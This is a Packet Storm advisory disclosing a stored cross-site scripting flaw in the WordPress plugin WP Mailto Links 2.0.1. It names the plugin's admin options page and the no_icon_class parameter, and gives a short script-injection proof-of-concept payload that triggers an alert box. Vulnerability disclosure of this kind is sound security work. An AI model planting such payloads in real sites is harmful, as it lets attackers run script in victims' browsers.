WordPress WP Mailto Links 2.0.1 Cross Site Scripting

2016-03-12T00:00:00
ID PACKETSTORM:136229
Type packetstorm
Reporter Ehsan Hosseini
Modified 2016-03-12T00:00:00

Description

                                        
                                            `================================================================================  
# WordPress WP Mailto Links 2.0.1 - Stored Cross Site Scripting  
================================================================================  
# Author: Ehsan Hosseini  
# Vendor Homepage: https://wordpress.org/plugins/wp-mailto-links/  
# Software Link :  
https://downloads.wordpress.org/plugin/wp-mailto-links.2.0.1.zip  
# Version : 2.0.1  
# Date: 12/03/2016  
# Contact: hehsan979@gmail.com  
# Source: http://ehsansec.ir/advisories/wpmailtolinks-xss.txt  
================================================================================  
# Vulnerability Details :  
Type : Stored XSS  
Minimum Level of Access Required : Change Plugin Values.  
  
# PoC :  
In the following field put the payload as below  
http://localhost/wordpress/wp-admin/options-general.php?page=wp-mailto-links-option-page  
Vulnerable Parameter :  
  
wp-mailto-links[no_icon_class] = "><script>alert('Ehsan Cod3r')</script>  
  
================================================================================  
# Ya Fateme!  
In Roza Hassan Ye Ghoshe Kez Karde !  
In Roza Kasi Az Hal Emam Zaman Khabar Nadre !  
Vay Madaram!  
================================================================================  
# Discovered By : Ehsan Hosseini (EhsanSec.ir)  
================================================================================  
`